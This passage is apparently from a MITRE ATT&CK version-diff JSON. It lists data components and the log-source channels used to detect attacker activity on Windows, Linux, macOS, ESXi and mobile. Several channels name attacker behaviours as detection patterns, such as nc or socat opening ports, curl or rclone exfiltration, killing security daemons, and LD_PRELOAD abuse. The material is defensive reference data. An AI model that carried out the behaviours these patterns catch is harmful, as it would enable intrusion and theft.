                            "channel": "execve: systemctl stop, service stop, or kill -9 on security daemons (e.g., falcon-sensor, auditd)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of launchctl unload, kill, or removal of security agent daemons"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process activity, exec events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream process subsystem"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process:exec and kext load events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream --info --predicate 'eventMessage CONTAINS \"exec\"'"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-DotNETRuntime",
                            "channel": "Unexpected AppDomain creation events or anomalous AppDomainManager assembly load behavior"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Execution of network stress tools or anomalies in socket/syscall behavior"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unsigned binary execution following SIP change"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Commands altering firewall or enabling listeners (iptables, nft, ufw, firewall-cmd, systemctl start *ssh*/*telnet*, ip route add, tcpdump, tshark)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec: Execution of /sbin/pfctl, /usr/libexec/ApplicationFirewall/socketfilterfw, ifconfig, tcpdump, npcap/libpcap consumers"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of zip, ditto, hdiutil, or openssl by non-terminal parent processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of binaries with TCC protected access under unexpected parent processes such as Finder.app, SystemUIServer, or nsurlsessiond"
                        },
                        {
                            "name": "WinEventLog:AppLocker",
                            "channel": "EventCode=8003, 8004"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve, unlink"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "launchd, processes"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "socat, ssh, or nc processes opening unexpected ports"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process execution of ssh with -L/-R forwarding flags"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchd or cron spawning mining binaries"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve or socket/connect system calls for processes using RSA handshake"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process invoking SecKeyCreateRandomKey or asymmetric crypto APIs"
                        },
                        {
                            "name": "azure:vmguest",
                            "channel": "Unexpected execution of cloud agent processes (e.g., WindowsAzureGuestAgent.exe, ssm-agent) followed by arbitrary script or binary execution"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Script interpreter invoked by nginx/apache worker process"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of Office binaries with network activity"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launch of bash/zsh/python/osascript targeting key file locations"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of /sbin/emond with child processes launched"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "provider: ETW CreateProcess events linking msbuild.exe to suspicious children where standard logs are incomplete"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "shutdown -h now or reboot"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of Code.app, idea, JetBrainsToolbox, eclipse with install/extension flags"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process execution events for system discovery utilities (system_profiler, sysctl, networksetup, ioreg) with parameter analysis"
                        },
                        {
                            "name": "OpenBSM:AuditTrail",
                            "channel": "BSM audit events for process execution and system call monitoring during reconnaissance"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "host daemon events related to VM operations and configuration queries during reconnaissance"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "VMware kernel events for hardware and system configuration access during environmental validation"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "processes modifying environment variables related to history logging"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: parent process is usb/hid device handler, child process bash/python invoked"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of curl, rclone, or Office apps invoking network sessions"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec: Execution of kextstat, kextfind, or ioreg targeting driver information"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "exec events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process creation involving binaries interacting with resource fork data"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process event"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of suspicious exploit binaries targeting security daemons"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "execve: Unsigned or unnotarized processes launched with high privileges"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "security OR injection attempts into 1Password OR LastPass"
                        },
                        {
                            "name": "AndroidLogs:Kernel",
                            "channel": "init or zygote process executing scripts or binaries from non-standard data or sdcard locations during early boot"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "launchd invocation of binary from non-Apple, non-AppStore, or sideloaded location during boot or shortly after unlock"
                        },
                        {
                            "name": "AndroidLogs:Framework",
                            "channel": "Creation of a new process running as system or root UID whose executable path resides under an app container path (for example, /data/app or /data/user/0/<pkg>), or whose parent process originates from an app sandbox"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Creation of a new process with elevated UID or sensitive entitlements whose binary path is associated with an app container or whose parent/caller is a low-privileged app/webcontent process"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "dlopen of a recently created .so OR short-lived child (/system/bin/sh,toybox,linker) spawned by app_process"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "startActivity on top of <target_pkg> (launchMode/singleTop), task switch immediately after focus"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "unexpected spikes in fork/exec/app process start events for helper utilities used for enumeration (ps, toybox/toolbox variants) from same UID"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application writes audio buffer or recorded audio file into application storage directories"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Browser or WebView-hosting application brought to foreground and navigates to external content, followed by abnormal state transition, crash, restart, or process spawn behavior"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application installed from adb, sideload, or unknown USB source"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes Runtime.exec, ProcessBuilder, JNI-backed command launcher, or equivalent command-execution bridge immediately before shell or command process creation"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Managed app invokes lower-level OS process-launch or command-execution behavior before file or network effects, including interpreter-like execution flow where visible to sensor"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application execution triggered with unexpected parent context or via indirect invocation (intent redirection or component hijack)"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_data_source_ref']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-13 15:49:16.424000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/data-components/DC0032\", \"old_value\": \"https://attack.mitre.org/datacomponents/DC0032\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][320]\": {\"name\": \"AndroidLogs:Kernel\", \"channel\": \"init or zygote process executing scripts or binaries from non-standard data or sdcard locations during early boot\"}, \"root['x_mitre_log_sources'][321]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"launchd invocation of binary from non-Apple, non-AppStore, or sideloaded location during boot or shortly after unlock\"}, \"root['x_mitre_log_sources'][322]\": {\"name\": \"AndroidLogs:Framework\", \"channel\": \"Creation of a new process running as system or root UID whose executable path resides under an app container path (for example, /data/app or /data/user/0/<pkg>), or whose parent process originates from an app sandbox\"}, \"root['x_mitre_log_sources'][323]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Creation of a new process with elevated UID or sensitive entitlements whose binary path is associated with an app container or whose parent/caller is a low-privileged app/webcontent process\"}, \"root['x_mitre_log_sources'][324]\": {\"name\": \"android:logcat\", \"channel\": \"dlopen of a recently created .so OR short-lived child (/system/bin/sh,toybox,linker) spawned by app_process\"}, \"root['x_mitre_log_sources'][325]\": {\"name\": \"android:logcat\", \"channel\": \"startActivity on top of <target_pkg> (launchMode/singleTop), task switch immediately after focus\"}, \"root['x_mitre_log_sources'][326]\": {\"name\": \"android:logcat\", \"channel\": \"unexpected spikes in fork/exec/app process start events for helper utilities used for enumeration (ps, toybox/toolbox variants) from same UID\"}, \"root['x_mitre_log_sources'][327]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application writes audio buffer or recorded audio file into application storage directories\"}, \"root['x_mitre_log_sources'][328]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Browser or WebView-hosting application brought to foreground and navigates to external content, followed by abnormal state transition, crash, restart, or process spawn behavior\"}, \"root['x_mitre_log_sources'][329]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application installed from adb, sideload, or unknown USB source\"}, \"root['x_mitre_log_sources'][330]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes Runtime.exec, ProcessBuilder, JNI-backed command launcher, or equivalent command-execution bridge immediately before shell or command process creation\"}, \"root['x_mitre_log_sources'][331]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Managed app invokes lower-level OS process-launch or command-execution behavior before file or network effects, including interpreter-like execution flow where visible to sensor\"}, \"root['x_mitre_log_sources'][332]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application execution triggered with unexpected parent context or via indirect invocation (intent redirection or component hijack)\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2022-05-11 16:22:58.802000+00:00",
                    "modified": "2026-04-22 14:51:44.669000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0107",
                            "external_id": "DC0107"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Process History/Live Data",
                    "description": "This includes any data stores that maintain historical or real-time events and telemetry recorded from various sensors or devices",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Databases",
                            "channel": "None"
                        },
                        {
                            "name": "Operational Databases",
                            "channel": "None"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-22 14:51:44.669000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][0]\": {\"name\": \"Databases\", \"channel\": \"None\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.272000+00:00",
                    "modified": "2026-04-16 17:01:33.771000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0034",
                            "external_id": "DC0034"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Process Metadata",
                    "description": "Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Process",
                            "channel": "None"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem=com.apple.process"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
                            "channel": "CodeIntegrity/WDAC events indicating unsigned/invalid DLL loads"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "sudo or service accounts invoking loaders with suspicious env vars"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Process Context"
                        },
                        {
                            "name": "esxi:auth",
                            "channel": "user session"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Admin activity"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve call for sudo where euid != uid"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem=com.apple.TCC"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec of binary with setuid/setgid and EUID != UID"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Use of fork/exec with DISPLAY unset or redirected"
                        },
                        {
                            "name": "EDR:Telemetry",
                            "channel": "Process lineage and API usage enrichment (GetSystemTime, GetTimeZoneInformation, NtQuerySystemTime)"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "/var/log/hostd.log API calls reading/altering time/ntp settings"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve, prctl, or ptrace activity affecting process memory or command-line arguments"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Cross-reference argv[0] with actual executable path and parent process metadata"
                        },
                        {
                            "name": "WinEventLog:AppLocker",
                            "channel": "AppLocker audit/blocks showing developer utilities executing scripts/binaries outside policy"
                        },
                        {
                            "name": "EDR:hunting",
                            "channel": "Correlation of signer info, parent-child lineage, rare invocation context (user host role), and API surfaces (CreateProcess*, LoadLibrary*)"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Security-Mitigations/KernelMode",
                            "channel": "ETW telemetry indicating ClickOnce deployment (dfsvc.exe) launching payloads"
                        },
                        {
                            "name": "etw:Microsoft-Windows-ClickOnce",
                            "channel": "provider: Event Tracing for Windows (ETW) events associated with ClickOnce deployment (dfsvc.exe activity)"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Windows Camera Frame Server/Operational",
                            "channel": "Process session start/stop events for camera pipeline by unexpected executables"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "select: path LIKE '/dev/video%'"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "state=attached/debugged"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Code Execution & Entitlement Access"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process opening SSH_AUTH_SOCK or /tmp/ssh-* socket not owned by same UID"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "code signature/memory protection"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve with UID \u2260 EUID"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve with escalated privileges"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "cross-account or unexpected assume role"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log collect from launchd and process start"
                        },
                        {
                            "name": "containerd:events",
                            "channel": "Docker or containerd image pulls and process executions"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Kernel or daemon warnings of downgraded TLS or cryptographic settings"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modifications or writes to EFI system partition for downgraded bootloaders"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "non-shell process tree accessing bash history"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "process metadata mismatch between /proc and runtime attributes"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "process environment variables containing LD_PRELOAD"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "EventCode=400, 403"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Process Execution + Hash"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "process_start: EventHeader.ProcessId true parent vs reported PPID mismatch"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC, ES_EVENT_TYPE_NOTIFY_MMAP"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
                            "channel": "Unsigned/invalid signature modules or images loaded by msbuild.exe or its children"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-DeviceGuard/Operational",
                            "channel": "WDAC policy audit/block affecting msbuild.exe spawned payloads"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-SmartAppControl/Operational",
                            "channel": "Smart App Control decisions (audit/block) for msbuild.exe-launched executables"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
                            "channel": "Unsigned or untrusted modules loaded during JamPlus.exe runtime"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Crash or abnormal termination of security agent or system extension host"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 17:01:33.771000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][44]\": {\"name\": \"macos:unifiedlog\", \"channel\": \"Crash or abnormal termination of security agent or system extension host\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2022-05-11 16:22:58.802000+00:00",
                    "modified": "2026-04-22 15:07:16.930000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0109",
                            "external_id": "DC0109"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Process/Event Alarm",
                    "description": "This includes a list of any process alarms or alerts produced to indicate unusual or concerning activity within the operational process (e.g., increased temperature/pressure)",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Databases",
                            "channel": "None"
                        },
                        {
                            "name": "Operational Databases",
                            "channel": "None"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-22 15:07:16.930000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][0]\": {\"name\": \"Databases\", \"channel\": \"None\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.273000+00:00",
                    "modified": "2026-04-20 18:21:23.994000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0065",
                            "external_id": "DC0065"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Service Modification",
                    "description": "Changes made to an existing service or daemon, such as modifying the service name, start type, execution parameters, or security configurations.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "esxi:hostd",
                            "channel": "service state change"
                        },
                        {
                            "name": "Service",
                            "channel": "None"
                        },
                        {
                            "name": "WinEventLog:Microsoft-IIS-Configuration",
                            "channel": "Module or ISAPI filter registration events"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "EventCode=7040"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-20 18:21:23.994000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][0]\": {\"name\": \"esxi:hostd\", \"channel\": \"service state change\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                }
            ],
            "other_version_changes": [],
            "patches": [
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.273000+00:00",
                    "modified": "2026-04-16 16:59:19.254000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0041",
                            "external_id": "DC0041"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Service Metadata",
                    "description": "Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Service",
                            "channel": "None"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=4"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "service stopped messages"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchctl disable or bootout calls"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Stop VM or disable service events via vim-cmd"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "auditd service stopped or disabled"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "launchd"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "scheduled/real-time"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem=com.apple.launchservices"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "registers services with legitimate-sounding names"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "EventCode=7035"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Service restart with modified executable path"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Observed loading of new LaunchAgent or LaunchDaemon plist"
                        },
                        {
                            "name": "kubernetes:audit",
                            "channel": "seccomp or AppArmor profile changes"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "Service stopped or RecoveryDisabled set via REAgentC"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Service events"
                        },
                        {
                            "name": "WinEventLog:WinRM",
                            "channel": "EventCode=6"
                        },
                        {
                            "name": "auditd:CONFIG_CHANGE",
                            "channel": "delete: Modification of systemd unit files or config for security agents"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification of system configuration profiles affecting security tools"
                        },
                        {
                            "name": "kubernetes:audit",
                            "channel": "kubectl delete or patch of security pods/admission controllers"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "write: Startup configuration changes disabling security checks"
                        },
                        {
                            "name": "auditd:DAEMON",
                            "channel": "auditd stopped, config changed, logging suspended"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 16:59:19.254000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][21]\": {\"name\": \"auditd:DAEMON\", \"channel\": \"auditd stopped, config changed, logging suspended\"}}}",
                    "previous_version": "2.0"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.273000+00:00",
                    "modified": "2026-03-13 23:12:09.029000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0063",
                            "external_id": "DC0063"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Windows Registry Key Modification",
                    "description": "Changes made to an existing registry key or its values. These modifications can include altering permissions, modifying stored data, or updating configuration settings.\n\n*Data Collection Measures:*\n\n- Windows Event Logs\n    - Event ID 4657 - Registry Value Modified: Logs changes to registry values, including modifications to startup entries, security settings, or system configurations.\n- Sysmon (System Monitor) for Windows\n    - Sysmon Event ID 13 - Registry Value Set: Captures changes to specific registry values.\n    - Sysmon Event ID 14 - Registry Key & Value Renamed: Logs renaming of registry keys, which may indicate evasion attempts.\n- Endpoint Detection and Response (EDR) Solutions\n    - Monitor registry modifications for suspicious behavior.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4657"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4663, 4670, 4656"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "StubPath value written under HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "MacroSecuritySettingsChanged or SafeModeDisabled"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=13, 14"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "modification to Winlogon registry keys such as Shell, Notify, or Userinit"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "Registry key modification HKLM\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient\\EnableMulticast"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "g_CiOptions modification or SIP state change"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "Autoruns reports DLLs in AppInit_DLLs key"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_data_source_ref']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-13 23:12:09.029000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/data-components/DC0063\", \"old_value\": \"https://attack.mitre.org/datacomponents/DC0063\"}}, \"iterable_item_removed\": {\"root['x_mitre_log_sources'][0]\": {\"name\": \"Windows Registry\", \"channel\": \"None\"}}}",
                    "previous_version": "2.0"
                }
            ],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        },
        "detectionstrategies": {
            "additions": [
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--c779ee07-ee85-42fe-a2c1-14ce25766cdf",
                    "created": "2026-04-22T21:48:05.256Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0910",
                            "external_id": "DET0910"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:27:42.639Z",
                    "name": "Detection of Block Communications",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
